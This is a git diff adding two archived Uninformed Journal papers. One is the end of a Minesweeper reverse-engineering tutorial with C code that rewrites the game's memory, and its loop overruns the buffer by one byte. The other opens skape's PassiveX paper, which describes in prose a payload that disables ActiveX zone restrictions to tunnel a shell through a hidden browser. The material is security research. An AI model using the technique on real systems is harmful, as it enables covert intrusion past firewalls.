Coincidentally, the number two will appear. Next, click +on the position to the immediate left of the number two. This position +contains a bomb and will trigger a breakpoint in WinDBG. Switch over to +WinDBG and direct attention to the Memory window. Press 'Next' +in the Memory window twice to bring this range into focus. + +01005640 10 8f 0f 0f 0f 8f 0f 0f 8f 0f 8f 0f 0f 0f 0f 8f ................ +01005650 0f 8f 0f 0f 0f 8f 0f 0f 0f 0f 0f 0f 0f cc 42 10 ..............B. +01005660 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................ 
+01005670 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................
+
+Following the same overlay as before, the reader will notice that the
+previous correlations can be made between the last row of the playing grid
+and the information located at 0x01005640, the start of the previously
+identified 32 byte pattern. Notice, again, each bomb is represented by 0x8f.
+With this information the reader can reasonably conclude that this is indeed
+the playing grid.
+
+
+7) Removing Mines
+
+Before venturing into a programmatic method of instrumenting the playing
+grid, the reader will first be introduced to a tool provided by WinDBG, more
+specifically, the (e)nter values command. This command allows the reader to
+manipulate specific portions of virtual memory and can be utilized to,
+amongst other things, remove bombs from the WinMine playing grid. First,
+reset the grid by resuming the WinMine process in WinDBG, clicking on the
+yellow smiley face in WinMine, and running the SetGrid application. Next,
+click on the top left position to expose the two and break the WinMine
+process within WinDBG by pressing Control+Break. The reader should recall
+that the address 0x01005362, to the immediate right of the two, contains a
+bomb. To demonstrate the enter values command, perform the following in the
+Command window.
+
+eb 0x01005362 0x0f
+
+Resume WinMine in WinDBG and click on the position to the right of the two.
+Notice that, instead of a bomb being displayed, the number two is revealed.
+The reader could perform the tedious task of repeating this procedure
+manually throughout the grid, or one could develop an application to reveal
+and/or remove the bombs.
+
+
+7.1) Virtual Mine Sweeper
+
+In this section, the reader will be introduced to portions of the Windows API
+that will allow one to develop an application that performs the following:
+
+   1. Locate and attach to the WinMine process
+   2. Read the WinMine playing grid
+   3. Manipulate the grid to either reveal or remove hidden bombs
+   4. Write the newly modified grid back into WinMine application space
+
+To accomplish the first task, one can enlist the services of the Tool Help
+Library, which is exposed via Tlhelp32.h. A snapshot of running processes can
+be obtained by calling CreateToolhelp32Snapshot, which has the following
+prototype (this information can be obtained by referencing the Platform SDK):
+
+HANDLE WINAPI CreateToolhelp32Snapshot(
+  DWORD dwFlags,
+  DWORD th32ProcessID
+);
+
+This function, when called with dwFlags set to TH32CS_SNAPPROCESS, will
+provide the reader with a handle to the current process list.
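+A minimal sketch of this first step, mirroring the fuller listings in
+references [12] and [13], might look like the following; the enumeration
+itself is covered next:
+
+#include <windows.h>
+#include <tlhelp32.h>
+#include <stdio.h>
+
+int main(void)
+{
+    /* Take a snapshot of every process currently running on the system. */
+    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+
+    if (hSnap == INVALID_HANDLE_VALUE) {
+        printf("Unable to get process list (%lu).\n", GetLastError());
+        return 0;
+    }
+
+    /* ... enumeration with Process32First/Process32Next goes here ... */
+
+    CloseHandle(hSnap);
+    return 0;
+}
+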
To +enumerate this list, the reader must first invoke the Process32First +function, which has the following prototype: + +BOOL WINAPI Process32First( + HANDLE hSnapshot, + LPPROCESSENTRY32 lppe +); + +Subsequent iterations through the process list are accessible via the +Process32Next function, which has the following prototype: + +BOOL WINAPI Process32Next( + HANDLE hSnapshot, + LPPROCESSENTRY32 lppe +); + +As the reader surely noticed, both of these functions return a LPPROCESSENTRY32, +which includes a variety of helpful information: + +typedef struct tagPROCESSENTRY32 { + DWORD dwSize; + DWORD cntUsage; + DWORD th32ProcessID; + ULONG_PTR th32DefaultHeapID; + DWORD th32ModuleID; + DWORD cntThreads; + DWORD th32ParentProcessID; + LONG pcPriClassBase; + DWORD dwFlags; + TCHAR szExeFile[MAX_PATH]; +} PROCESSENTRY32, *PPROCESSENTRY32; + +Most notably of which is szExeFile, which will allow the reader to locate +the WinMine process, and th32ProcessID, which provides the process ID to +attach to once the WinMine process is found. Once the WinMine process is +located, it can be attached to via the OpenProcess function, which has +the following prototype: + +HANDLE OpenProcess( + DWORD dwDesiredAccess, + BOOL bInheritHandle, + DWORD dwProcessId +); + +Once the WinMine process has been opened, the reader may read the current +playing grid from its virtual memory via the ReadProcessMemory function, +which has the following prototype: + +BOOL ReadProcessMemory( + HANDLE hProcess, + LPCVOID lpBaseAddress, + LPVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesRead +); + +After the grid is read into the buffer, the reader may loop through it +replacing all instances of 0x8f with either 0x8a to reveal bombs, or 0x0f to +remove them. This modified buffer can then be written back into the WinMine +process with the WriteProcessMemory function, which has the following +prototype: + +BOOL WriteProcessMemory( + HANDLE hProcess, + LPVOID lpBaseAddress, + LPCVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesWritten +); + +With this information, the reader has the tools necessary to develop an +application that to reach the ultimate goal of this paper, to reveal +and/or remove bombs from the WinMine playing grid. The source code +for a functioning demonstration of this can be found in the reference +section.[13] + + +8) Conclusion + +Throughout this document the reader has been exposed to portions of many +concepts required to successfully locate, comprehend, and manipulate the +WinMine playing grid. As such, many details surrounding these concepts +were neglected for the sake of brevity. In order to obtain a more holistic +view of the covered concepts, the reader is encouraged to read those items +articulated in the reference section and seek out additional works. + +References + + 1. Calling Conventions http://www.unixwiz.net/techtips/win32-callconv-asm.html + 2. Symbol Server http://www.microsoft.com/whdc/devtools/debugging/debugstart.mspx + 3. Symbols ms-help://MS.PSDK.1033/debug/base/symbolfiles.htm + 4. Platform SDK www.microsoft.com/msdownload/platformsdk/sdkupdate/ + 5. Endianness http://www.intel.com/design/intarch/papers/endian.pdf + 6. EFLAGS ftp://download.intel.com/design/Pentium4/manuals/25366514.pdf Appendix B + 7. Intel Command References http://www.intel.com/design/pentium4/manuals/indexnew.htm + 8. Debugger Quick Reference http://www.tonyschr.net/debugging.htm + 9. WinDBG Prompt Reference WinDBG Help, Search, Command Window Prompt + 10. 
Regular Expressions Reference WinDBG Help, Search, Regular Expression Syntax + 11. TEB http://msdn.microsoft.com/library/en-us/dllproc/base/teb.asp + 12. SetGrid.cpp + +/********************************************************************** + * SetGrid.cpp - trew@exploit.us + * + * This is supplemental code intended to accompany 'Introduction to + * Reverse Engineering Windows Applications' as part of the Uninformed + * Journal. This application sets the reader's playing grid in a + * deterministic manner so that demonstrations made within the paper + * correlate with what the reader encounters in his or her instance of + * WinMine. + * + *********************************************************************/ + +#include +#include +#include + +#pragma comment(lib, "advapi32.lib") + +#define GRID_ADDRESS 0x1005360 +#define GRID_SIZE 0x300 + +int main(int argc, char *argv[]) { + + HANDLE hProcessSnap = NULL; + HANDLE hWinMineProc = NULL; + + PROCESSENTRY32 peProcess = {0}; + + unsigned int procFound = 0; + unsigned long bytesWritten = 0; + + unsigned char grid[] = + + "\x10\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x8f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x8f\x10" + "\x10\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x10" + "\x10\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f" + "\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x10" + "\x10\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f" + "\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x0f" + "\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x10" + "\x10\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x10" + "\x10\x8f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x8f\x0f" + "\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x10" + "\x10\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x8f\x0f" + "\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x10" + "\x10\x8f\x0f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x0f" + "\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x10" + "\x10\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f" + "\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x10" + "\x10\x0f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f" + "\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f" + "\x8f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x10" + "\x10\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x10" + "\x10\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x0f" + "\x0f\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x0f\x8f\x8f\x0f\x10" + "\x10\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x8f" + "\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x0f" + 
"\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x10" + "\x10\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f" + "\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x10" + "\x10\x8f\x8f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f" + "\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x0f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x0f" + "\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x10" + "\x10\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x10" + "\x10\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x10" + "\x10\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x10"; + + + //Get a list of running processes + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + + if(hProcessSnap == INVALID_HANDLE_VALUE) { + printf("Unable to get process list (%d).\n", GetLastError()); + return 0; + } + + peProcess.dwSize = sizeof(PROCESSENTRY32); + + //Get first process in list + if(Process32First(hProcessSnap, &peProcess)) { + + do { + //Is it's winmine.exe? + if(!stricmp(peProcess.szExeFile, "winmine.exe")) { + + printf("Found WinMine Process ID (%d)\n", peProcess.th32ProcessID); + procFound = 1; + + //Get handle on winmine process + hWinMineProc = OpenProcess(PROCESS_ALL_ACCESS, + 1, + peProcess.th32ProcessID); + + //Make sure the handle is valid + + if(hWinMineProc == NULL) { + printf("Unable to open minesweep process (%d).\n", GetLastError()); + return 0; + } + + //Write grid + if(WriteProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPCVOID)grid, + GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to write process memory (%d).\n", GetLastError()); + return 0; + } else { + printf("Grid Update Successful\n"); + } + + //Let go of minesweep + CloseHandle(hWinMineProc); + break; + } + + //Get next process + } while(Process32Next(hProcessSnap, &peProcess)); + } + + if(!procFound) + printf("WinMine Process Not Found\n"); + + return 0; +} + + 13. MineSweeper.cpp + +/********************************************************************** + * MineSweeper.cpp - trew@exploit.us + * + * This is supplemental code intended to accompany 'Introduction to + * Reverse Engineering Windows Applications' as part of the Uninformed + * Journal. This application reveals and/or removes mines from the + * WinMine grid. Note, this code only works on the version of WinMine + * shipped with WinXP, as the versions differ between releases of + * Windows. 
+ * + *********************************************************************/ + +#include +#include +#include + +#pragma comment(lib, "advapi32.lib") + +#define BOMB_HIDDEN 0x8f +#define BOMB_REVEALED 0x8a +#define BLANK 0x0f +#define GRID_ADDRESS 0x1005360 +#define GRID_SIZE 0x300 + +int main(int argc, char *argv[]) { + + HANDLE hProcessSnap = NULL; + HANDLE hWinMineProc = NULL; + + PROCESSENTRY32 peProcess = {0}; + + unsigned char procFound = 0; + unsigned long bytesWritten = 0; + unsigned char *grid = 0; + unsigned char replacement = BOMB_REVEALED; + unsigned int x = 0; + + grid = (unsigned char *)malloc(GRID_SIZE); + + if(!grid) + return 0; + + if(argc > 1) { + if(stricmp(argv[1], "remove") == 0) { + replacement = BLANK; + } + } + + //Get a list of running processes + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + + //Ensure the handle is valid + if(hProcessSnap == INVALID_HANDLE_VALUE) { + printf("Unable to get process list (%d).\n", GetLastError()); + return 0; + } + + peProcess.dwSize = sizeof(PROCESSENTRY32); + + //Get first process in list + if(Process32First(hProcessSnap, &peProcess)) { + + do { + //Is it's winmine.exe? + if(!stricmp(peProcess.szExeFile, "winmine.exe")) { + + printf("Found WinMine Process ID (%d)\n", peProcess.th32ProcessID); + procFound = 1; + + //Get handle on winmine process + hWinMineProc = OpenProcess(PROCESS_ALL_ACCESS, + 1, + peProcess.th32ProcessID); + + //Make sure the handle is valid + if(hWinMineProc == NULL) { + printf("Unable to open minesweep process (%d).\n", GetLastError()); + return 0; + } + + //Read Grid + if(ReadProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPVOID)grid, GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to read process memory (%d).\n", GetLastError()); + return 0; + } else { + //Modify Grid + for(x=0;x<=GRID_SIZE;x++) { + if((*(grid + x) & 0xff) == BOMB_HIDDEN) { + *(grid + x) = replacement; + } + } + } + + //Write grid + if(WriteProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPCVOID)grid, + GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to write process memory (%d).\n", GetLastError()); + return 0; + } else { + printf("Grid Update Successful\n"); + } + + //Let go of minesweep + CloseHandle(hWinMineProc); + break; + } + + //Get next process + } while(Process32Next(hProcessSnap, &peProcess)); + } + + if(!procFound) + printf("WinMine Process Not Found\n"); + + return 0; +} diff --git a/uninformed/1.2.txt b/uninformed/1.2.txt new file mode 100644 index 0000000..bf14b7f --- /dev/null +++ b/uninformed/1.2.txt @@ -0,0 +1,1219 @@ +Post-Exploitation on Windows using ActiveX Controls +skape +mmiller@hick.org +Last modified: 03/18/2005 + + +1) Foreword + +Abstract: When exploiting software vulnerabilities it is +sometimes impossible to build direct communication channels between +a target machine and an attacker's machine due to restrictive +outbound filters that may be in place on the target machine's +network. Bypassing these filters involves creating a +post-exploitation payload that is capable of masquerading as normal +user traffic from within the context of a trusted process. One +method of accomplishing this is to create a payload that enables +ActiveX controls by modifying Internet Explorer's zone restrictions. +With ActiveX controls enabled, the payload can then launch a hidden +instance of Internet Explorer that is pointed at a URL with an +embedded ActiveX control. 
The end result is the ability for an +attacker to run custom code in the form of a DLL on a target machine +by using a trusted process that uses one or more trusted +communication protocols, such as HTTP or DNS. + +Thanks: The author would like to thank H D Moore, spoonm, +vlad902, thief, warlord, optyx, johnycsh, trew, jhind, and all the +other people who continue to research new and interesting things for +their own satisfaction and enjoyment. The author would also like to +thank the Metasploit Framework mailing list for the discussion on +HTTP tunneling which served as the impetus for implementing and +integrating PassiveX. + +The source code to the ActiveX Injection Payload and ActiveX control +described in this document can be found as an update to the +Metasploit Framework version 2.3 which can be downloaded from +http://www.metasploit.com. PassiveX was tested with ZoneAlarm +version 5.5.062.011. + + +2) Introduction + +The emphasis in exploit development tends to lean more towards the +techniques used to successfully execute code on a target machine +rather than the code, or payload, that will actually be executed +once an exploit has taken advantage of a vulnerability. While such +an emphasis is an obvious and warranted pre-requisite, it is also +just as important to identify and refine the techniques that can be +used once it is possible to execute arbitrary code on a target +machine. In general, most published exploits include a finite set +of payloads that are themselves only capable of performing a small +set of actions, such as connecting back to the attacker and +providing them with a command interpreter or allowing the attacker +to connect to the target machine to gain access to a command +interpreter There are other classes of post-exploitation +payloads but these two are the most prominent. findsock +style payloads are excluded from this discussion due to the fact +that they are vulnerability dependent and as such not as universal +as the two commonly used payloads.. Payloads such as these are +indeed quite useful but are prone to failure under conditions that +cannot always be predicted by an attacker. + +For instance, an attacker could be exploiting a software +vulnerability in an HTTP server that only permits connections to +port 80. In this case, if an attacker were to use a payload that +binds to a port on the target machine, the attacker would soon find +that it would be impossible to connect to the bound port, regardless +of whether or not the exploit actually succeeded In some +cases it is possible to rebind to the port of the service being +exploited. This fact is outside of the scope of this document.. +The same case applies to payloads that establish a connection to the +attacker on an arbitrary port. If the service being attacked is on +a machine that has restrictive outbound filters or has a personal +firewall installed that restricts specific types of internet access +for certain applications, the attacker may find it impossible to use +either of the two common payloads. + +With that said, the majority of computers connected to the internet +do not have highly restrictive outbound filters. The reason this is +the case is because many home users simply plug their computer +directly into the internet via their cable modem, DSL router, or +phone line instead of a network firewall device. 
Furthermore, the +level of understanding required to competently manage outbound +filters is generally not something that is a strong desire or +possibility for the average computer user. For the sake of +discussion, however, these users will be disregarded due to the fact +that currently employed payloads are sufficient to establish a +communication channel between the attacker and a target machine. +Instead, the focus will be put upon those machines that make use of +outbound filters that are capable of preventing the two +aforementioned payloads from being used. + +There are three types of outbound filters that can be differentiated +by the OSI layer at which they filter and by the physical location +at which they reside. The first type of outbound filter is the +network-based filter which operates at the network and transport +layer by filtering connections based on information that is required +to communicate with a host, such as the destination IP address or +port of a packet. The second type of outbound filter is the +application-based filter which operates at the application layer by +filtering network traffic to certain destinations based on the +application that is performing the network action An +example of this comes in the form of ZoneAlarm's outbound filter +that prompts the user when an application attempts to make a +connection to determine whether or not the connection should be +allowed.. The third type of outbound filter operates transparently +at various layers of the OSI model as a type of protocol form +validation, such as a transparent HTTP proxy. These three filters +can be combined to create a robust and dynamic method of filtering +outbound connections that, while not perfect, does indeed lend +itself well to helping ensure the integrity of a network. + +The reason these three outbound filters are not perfect is because +of the fact that they still allow outbound communication. Though +this may seem like a paradox, it is actually a real problem. Take +for instance a scenario where a corporation's workstation is being +exploited through a client-side chat client vulnerability. In this +scenario, the corporation has configured their network firewalls to +allow communication to internet addresses on port 80 only. All +other outbound ports are filtered and cannot be communicated with. +Given these restrictions, an attacker might simply instruct his or +her payload to connect back to the attacker on port 80, thus +bypassing the other outbound restrictions altogether. While this +would indeed work, there are steps that the corporation could take +to help prevent this approach. For instance, if the same +corporation were to force all HTTP traffic through a transparent or +true HTTP proxy, the attacker would be unable to simply pipe a +command interpreter through a connection on port 80 since the data +would not be well-formed HTTP traffic. + +This is where things begin to get interesting and the inherent flaw +of generic outbound filters begins to come to light. Under the +aforementioned condition, a corporation has their network configured +to permit outbound communication on port 80 only and furthermore +requires all port 80 communication to pass through a transparent +HTTP proxy. As such, it is a requirement that all traffic passing +through port 80 to internet hosts be well-formed HTTP requests and +responses, else the transparent proxy will not permit it to pass. 
+The obvious thing for an attacker to do, then, is to tunnel or +encode their communication in valid HTTP requests and responses, +thus bypassing all of the restrictions that the corporation has put +in place. Hope is not yet lost for the corporation, however, for +they could deploy a personal firewall, such as ZoneAlarm, that is +capable of doing per-application outbound filters. This would allow +the corporation to make it so only a browser, such as Internet +Explorer or Mozilla, is capable of connecting to internet hosts on +port 80. All other applications, such as the chat client that is +being exploited in this scenario, would be unable to connect to +internet hosts on port 80 in the first place. + +It may seem like this would be enough to stop an attacker from being +able to build a communication channel between themselves and the +target machine, but the fact is that it is not, and thus the +inherent flaw in generic outbound filters is realized: If a +user is capable of communicating with hosts on the internet, so too +is an attacker capable of doing so from the user's computer. In +this case, an attacker could simply inject code into a trusted +browser process that then constructs an HTTP tunnel between the +target machine and the attacker, thus bypassing both the application +layer,network layer, and transparent outbound filters that the +corporation has put into place. + +The example of the HTTP tunnel is just one of many protocols that +can be used or abused to tunnel arbitrary data through restrictive +outbound filters. Other protocols that can, and have, been used in +the past for arbitrary data tunneling are DNS, POP3, and SMTP. These +protocols are also likely, though some of them less than others, to +be ones that a corporation or a user are likely to permit both at +the network layer and at the application layer. For the purpose of +this paper, only the implementation of the HTTP tunnel will be +discussed for it is the most likely of all others to be capable of +passing transparently through outbound filters The second +most likely, in the author's opinion, is DNS.. The following +chapters will discuss the implementation of a payload that is +capable of bypassing the scenario discussed in this introduction on +the Windows platform. From there, a number of potential uses, both +legitimate and otherwise, will be discussed to give a sense of +severity for the problem at hand. Finally, some suggestions will be +made on how payloads of this sort might be prevented from being +leveraged by an attacker in the future. + + +3) Implementation: PassiveX + +Implementing a payload that is capable of bypassing restrictive +outbound filters, such as those outlined in the introduction, +requires that the traffic produced by the payload be, for all +intents and purposes, indistinguishable from normal user traffic. +The protocol that should be used to encapsulate the attacker's +arbitrary data, such as the input and output from the command +interpreter, should also be one that is likely to be permitted by +the various types of outbound filters, whether they be network or +application based. One of the protocols capable of fulfilling both +of these requirements is HTTP. By making use of HTTP requests and +responses, it is possible for an attacker to create a bidirectional +tunnel between the target machine and the attacker's machine that +can be used to pass arbitrary data. 
+ +The way in which the tunnel can be constructed using HTTP is to +create two logical channels, similar to that of a bidirectional +pipe. The first channel, Tx, would be used to transmit +data from the target machine to the attacker's machine by making use +of an HTTP POST request. The content of the POST +would be the data that should be handed to the attacker. The second +channel, Rx, would be used to transmit data from the +attacker's machine to the target machine. The problem is, however, +that the data cannot be directly transmitted from the attacker's +machine to the target machine while still staying within the +parameters of well-formed HTTP traffic It is possible to +make use of technology like chunked encoding, however, such +technology is seen as easier to flag and detect as malicious traffic +from the perspective of an outbound filter and cannot always be +relied upon to work when passing through HTTP proxies.. One way of +getting around this fact would be to use a polling model whereby the +target machine sends polling HTTP GET or POST +requests to the attacker's machine to see if there is any data +available that should be handed to the target machine's half of the +tunnel. Once there is data available it can be included in the +content of the HTTP response to the target machine's HTTP request. +This approach is one that is commonly used and employed as a +tunneling mechanism. + +The first step in the building of an HTTP tunnel between the target +machine and the attacker's machine is to implement the payload that +will be executed after a given exploit succeeds. There are a number +of ways in which such a payload could be written with the most +obvious being a payload that directly builds and maintains the +bidirectional HTTP tunnel between the attacker and the target +machine. While this approach may sound good in principal, it is not +entirely practical. The reason for this is that the payload must be +written in assembly or in a language that is capable of producing +position independent code. This fact alone would make the +implementation of a payload that accomplishes HTTP tunneling tedious +but is in itself not necessarily enough to make it impractical. What +does make it impractical, however, is the fact that implementing +such a payload in a portable and position independent fashion would +lead to a very large payload. The size of a payload tends to be +rather important as it directly determines whether or not it can be +employed under certain conditions, such as where a vulnerability +only has a limited amount of room in which to store the payload that +will be executed. In scenarios such as these it is preferable to +have a payload that is as small as possible and yet still capable of +performing the task at hand. + +Even if it were possible to implement a small payload that were +capable of managing the HTTP tunneling, it alone would not be enough +to satisfy the requirements for the payload described in the +introduction. The reason it is not enough is because such a payload +would not necessarily be capable of bypassing application-based +outbound filters due to the fact that the application being +exploited, such as a chat client, may not itself be directly capable +of communicating with hosts on the internet over port 80. Instead, +it becomes necessary to run the code that performs the actual HTTP +tunneling in the context of a process that is most likely trusted by +the target machine, such as Internet Explorer. 
With this in mind it +seems clear that a technique other than implementing the entire HTTP +tunneling code in position independent assembly is necessary, both +from a practical and functional standpoint. + +An alternate technique that can be used is to implement a payload +that is itself not directly responsible for managing or initializing +the HTTP tunnel, but rather facilitates the execution of the code +that will be responsible for doing so. It's important to note, +however, that such a payload must do so in a fashion that does not +require network access due to the fact that ignoring such a +requirement would defeat the entire purpose of the HTTP tunneling +payload that it would be trying to load. With this in mind, it +becomes necessary to look towards other approaches that are capable +of facilitating the execution of code that will build an HTTP tunnel +between the target machine and the attacker's machine and, +furthermore, will do so using a medium that is compatible with the +various types of outbound filters. + +As luck would have it, a solution to this problem can be found in +Internet Explorer's ability to download and execute plugins. These +plugins, which are more commonly known as ActiveX controls, are a +means by which programmers can extend or enhance features in +Internet Explorer in a generic fashion Which, as fate would +have it, just so happens to align well with this paper's intention +of creating an HTTP tunnel in the context of a trusted process.. +Though ActiveX controls do have merit, many computer users tend to +be familiar with them not for the benefits they bring, but rather +for the spyware and other malicious content that they seem to +provide or be associated with. Due to this fact, it has become +common practice for computer's to be configured with ActiveX support +either completely disabled or conditionally permitted based on +Internet Explorer's built-in zone restrictions. + +Zone restrictions are a way in which Internet Explorer allows a user +to control the level of trust that is given to various sites. For +instance, sites in the Trusted Sites zone are considered to +have the highest level of trust and are thus capable of executing +ActiveX controls and other privileged content without necessarily +requiring input from the user. On the other hand, the +Internet zone represents the set of sites that exist on the +internet and are not expressly trusted by the user. The +Internet zone typically defaults to prohibiting the +downloading and execution of unsigned ActiveX controls. If an +ActiveX control is signed, the user will be prompted to determine +whether or not they wish to allow the signer of the ActiveX control +to execute code on the user's machine. + +With this knowledge of Internet Explorer's zone restrictions and its +built-in ability to download and execute ActiveX controls, it is +possible to construct a payload that can facilitate the establishing +of an HTTP tunnel between the target machine and the attacker, +regardless of whether or not outbound filters exist. One way that +this can be accomplished is by implementing a payload that first +modifies the zone restrictions for the Internet zone to +allow the downloading and execution of all ActiveX controls, thus +allowing it to work in environments that have explicitly disabled +ActiveX controls. The payload can then execute a hidden instance of +Internet Explorer and direct it at a URL on the internet that is +controlled by the attacker. 
The content of the target URL, in this
+scenario, would contain an embedded ActiveX control that Internet
+Explorer would download and run without question. As such, the code
+that would be responsible for building the HTTP tunnel could be
+implemented in the context of the ActiveX control that is
+downloaded, thus allowing the attacker to write the tunneling code
+in his or her language of choice due to the fact that ActiveX
+controls are language independent, so long as they conform to the
+necessary COM interfaces.
+
+Before describing the implementation of the payload and the
+respective ActiveX control, it is first important to understand some
+of the negative aspects of using such an approach. One of the most
+obvious cons is that such a payload is capable of, in the worst case
+scenario, leaving a user's computer completely open to future
+infection by way of untrusted ActiveX controls if the zone
+restrictions on the Internet zone are not restored. This
+can be solved by making the payload itself more robust in the way it
+handles the restoration of the zone restrictions, but it comes at
+the cost of size, which isn't always something that can be conceded.
+Another negative aspect of this approach is that it will not
+function when used against a user that does not have administrative
+privileges on the target machine. The reason for this is that
+Internet Explorer is hard-coded to prevent the downloading and
+execution of ActiveX controls that are not already registered and
+installed on the target machine. Under scenarios where it is known
+that a limited user account is being exploited, it may be possible
+to modify the payload to inject a secondary payload into the context
+of an Internet Explorer process that then downloads and registers
+the control manually (the control would have to be registered under
+the user-specific classes key instead of the global classes key in
+order to avoid permission problems). Regardless of the payload's
+deficiencies, it should nonetheless be considered a viable approach
+to the problem at hand.
+
+The payload itself has two distinct stages. The first stage is the
+payload that the exploit will send across, which is responsible for
+making modifications to Internet Explorer's zone restrictions and
+executing a hidden Internet Explorer pointed at a URL that is
+controlled by the attacker. The second stage starts once the ActiveX
+control that was embedded in the attacker controlled URL is loaded
+into the hidden Internet Explorer. Once loaded, the ActiveX control
+can simply build an HTTP tunnel between the two machines due to the
+fact that it's running in the context of a process that should be
